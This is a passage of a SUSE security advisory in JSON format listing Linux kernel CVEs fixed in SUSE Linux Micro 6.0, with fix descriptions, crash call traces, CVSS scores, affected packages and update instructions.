"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54038"
},
{
"cve": "CVE-2023-54042",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54042"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/64s: Fix VAS mm use after free\n\nThe refcount on mm is dropped before the coprocessor is detached.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54042",
"url": "https://www.suse.com/security/cve/CVE-2023-54042"
},
{
"category": "external",
"summary": "SUSE Bug 1255702 for CVE-2023-54042",
"url": "https://bugzilla.suse.com/1255702"
},
{
"category": "external",
"summary": "SUSE Bug 1257670 for CVE-2023-54042",
"url": "https://bugzilla.suse.com/1257670"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "important"
}
],
"title": "CVE-2023-54042"
},
{
"cve": "CVE-2023-54045",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54045"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\naudit: fix possible soft lockup in __audit_inode_child()\n\nTracefs or debugfs maybe cause hundreds to thousands of PATH records,\ntoo many PATH records maybe cause soft lockup.\n\nFor example:\n 1. CONFIG_KASAN=y \u0026\u0026 CONFIG_PREEMPTION=n\n 2. auditctl -a exit,always -S open -k key\n 3. sysctl -w kernel.watchdog_thresh=5\n 4. mkdir /sys/kernel/debug/tracing/instances/test\n\nThere may be a soft lockup as follows:\n watchdog: BUG: soft lockup - CPU#45 stuck for 7s! [mkdir:15498]\n Kernel panic - not syncing: softlockup: hung tasks\n Call trace:\n dump_backtrace+0x0/0x30c\n show_stack+0x20/0x30\n dump_stack+0x11c/0x174\n panic+0x27c/0x494\n watchdog_timer_fn+0x2bc/0x390\n __run_hrtimer+0x148/0x4fc\n __hrtimer_run_queues+0x154/0x210\n hrtimer_interrupt+0x2c4/0x760\n arch_timer_handler_phys+0x48/0x60\n handle_percpu_devid_irq+0xe0/0x340\n __handle_domain_irq+0xbc/0x130\n gic_handle_irq+0x78/0x460\n el1_irq+0xb8/0x140\n __audit_inode_child+0x240/0x7bc\n tracefs_create_file+0x1b8/0x2a0\n trace_create_file+0x18/0x50\n event_create_dir+0x204/0x30c\n __trace_add_new_event+0xac/0x100\n event_trace_add_tracer+0xa0/0x130\n trace_array_create_dir+0x60/0x140\n trace_array_create+0x1e0/0x370\n instance_mkdir+0x90/0xd0\n tracefs_syscall_mkdir+0x68/0xa0\n vfs_mkdir+0x21c/0x34c\n do_mkdirat+0x1b4/0x1d4\n __arm64_sys_mkdirat+0x4c/0x60\n el0_svc_common.constprop.0+0xa8/0x240\n do_el0_svc+0x8c/0xc0\n el0_svc+0x20/0x30\n el0_sync_handler+0xb0/0xb4\n el0_sync+0x160/0x180\n\nTherefore, we add cond_resched() to __audit_inode_child() to fix it.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54045",
"url": "https://www.suse.com/security/cve/CVE-2023-54045"
},
{
"category": "external",
"summary": "SUSE Bug 1256285 for CVE-2023-54045",
"url": "https://bugzilla.suse.com/1256285"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54045"
},
{
"cve": "CVE-2023-54048",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54048"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/bnxt_re: Prevent handling any completions after qp destroy\n\nHW may generate completions that indicates QP is destroyed.\nDriver should not be scheduling any more completion handlers\nfor this QP, after the QP is destroyed. Since CQs are active\nduring the QP destroy, driver may still schedule completion\nhandlers. This can cause a race where the destroy_cq and poll_cq\nrunning simultaneously.\n\nSnippet of kernel panic while doing bnxt_re driver load unload in loop.\nThis indicates a poll after the CQ is freed. \n\n[77786.481636] Call Trace:\n[77786.481640] \u003cTASK\u003e\n[77786.481644] bnxt_re_poll_cq+0x14a/0x620 [bnxt_re]\n[77786.481658] ? kvm_clock_read+0x14/0x30\n[77786.481693] __ib_process_cq+0x57/0x190 [ib_core]\n[77786.481728] ib_cq_poll_work+0x26/0x80 [ib_core]\n[77786.481761] process_one_work+0x1e5/0x3f0\n[77786.481768] worker_thread+0x50/0x3a0\n[77786.481785] ? __pfx_worker_thread+0x10/0x10\n[77786.481790] kthread+0xe2/0x110\n[77786.481794] ? __pfx_kthread+0x10/0x10\n[77786.481797] ret_from_fork+0x2c/0x50\n\nTo avoid this, complete all completion handlers before returning the\ndestroy QP. If free_cq is called soon after destroy_qp, IB stack\nwill cancel the CQ work before invoking the destroy_cq verb and\nthis will prevent any race mentioned.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54048",
"url": "https://www.suse.com/security/cve/CVE-2023-54048"
},
{
"category": "external",
"summary": "SUSE Bug 1256395 for CVE-2023-54048",
"url": "https://bugzilla.suse.com/1256395"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54048"
},
{
"cve": "CVE-2023-54049",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54049"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nrpmsg: glink: Add check for kstrdup\n\nAdd check for the return value of kstrdup() and return the error\nif it fails in order to avoid NULL pointer dereference.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54049",
"url": "https://www.suse.com/security/cve/CVE-2023-54049"
},
{
"category": "external",
"summary": "SUSE Bug 1256396 for CVE-2023-54049",
"url": "https://bugzilla.suse.com/1256396"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54049"
},
{
"cve": "CVE-2023-54051",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54051"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: do not allow gso_size to be set to GSO_BY_FRAGS\n\nOne missing check in virtio_net_hdr_to_skb() allowed\nsyzbot to crash kernels again [1]\n\nDo not allow gso_size to be set to GSO_BY_FRAGS (0xffff),\nbecause this magic value is used by the kernel.\n\n[1]\ngeneral protection fault, probably for non-canonical address 0xdffffc000000000e: 0000 [#1] PREEMPT SMP KASAN\nKASAN: null-ptr-deref in range [0x0000000000000070-0x0000000000000077]\nCPU: 0 PID: 5039 Comm: syz-executor401 Not tainted 6.5.0-rc5-next-20230809-syzkaller #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/26/2023\nRIP: 0010:skb_segment+0x1a52/0x3ef0 net/core/skbuff.c:4500\nCode: 00 00 00 e9 ab eb ff ff e8 6b 96 5d f9 48 8b 84 24 00 01 00 00 48 8d 78 70 48 b8 00 00 00 00 00 fc ff df 48 89 fa 48 c1 ea 03 \u003c0f\u003e b6 04 02 84 c0 74 08 3c 03 0f 8e ea 21 00 00 48 8b 84 24 00 01\nRSP: 0018:ffffc90003d3f1c8 EFLAGS: 00010202\nRAX: dffffc0000000000 RBX: 000000000001fffe RCX: 0000000000000000\nRDX: 000000000000000e RSI: ffffffff882a3115 RDI: 0000000000000070\nRBP: ffffc90003d3f378 R08: 0000000000000005 R09: 000000000000ffff\nR10: 000000000000ffff R11: 5ee4a93e456187d6 R12: 000000000001ffc6\nR13: dffffc0000000000 R14: 0000000000000008 R15: 000000000000ffff\nFS: 00005555563f2380(0000) GS:ffff8880b9800000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000020020000 CR3: 000000001626d000 CR4: 00000000003506f0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n\u003cTASK\u003e\nudp6_ufo_fragment+0x9d2/0xd50 net/ipv6/udp_offload.c:109\nipv6_gso_segment+0x5c4/0x17b0 net/ipv6/ip6_offload.c:120\nskb_mac_gso_segment+0x292/0x610 net/core/gso.c:53\n__skb_gso_segment+0x339/0x710 net/core/gso.c:124\nskb_gso_segment include/net/gso.h:83 [inline]\nvalidate_xmit_skb+0x3a5/0xf10 net/core/dev.c:3625\n__dev_queue_xmit+0x8f0/0x3d60 net/core/dev.c:4329\ndev_queue_xmit include/linux/netdevice.h:3082 [inline]\npacket_xmit+0x257/0x380 net/packet/af_packet.c:276\npacket_snd net/packet/af_packet.c:3087 [inline]\npacket_sendmsg+0x24c7/0x5570 net/packet/af_packet.c:3119\nsock_sendmsg_nosec net/socket.c:727 [inline]\nsock_sendmsg+0xd9/0x180 net/socket.c:750\n____sys_sendmsg+0x6ac/0x940 net/socket.c:2496\n___sys_sendmsg+0x135/0x1d0 net/socket.c:2550\n__sys_sendmsg+0x117/0x1e0 net/socket.c:2579\ndo_syscall_x64 arch/x86/entry/common.c:50 [inline]\ndo_syscall_64+0x38/0xb0 arch/x86/entry/common.c:80\nentry_SYSCALL_64_after_hwframe+0x63/0xcd\nRIP: 0033:0x7ff27cdb34d9",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54051",
"url": "https://www.suse.com/security/cve/CVE-2023-54051"
},
{
"category": "external",
"summary": "SUSE Bug 1256394 for CVE-2023-54051",
"url": "https://bugzilla.suse.com/1256394"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54051"
},
{
"cve": "CVE-2023-54052",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54052"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: mt76: mt7921: fix skb leak by txs missing in AMSDU\n\ntxs may be dropped if the frame is aggregated in AMSDU. When the problem\nshows up, some SKBs would be hold in driver to cause network stopped\ntemporarily. Even if the problem can be recovered by txs timeout handling,\nmt7921 still need to disable txs in AMSDU to avoid this issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54052",
"url": "https://www.suse.com/security/cve/CVE-2023-54052"
},
{
"category": "external",
"summary": "SUSE Bug 1256387 for CVE-2023-54052",
"url": "https://bugzilla.suse.com/1256387"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
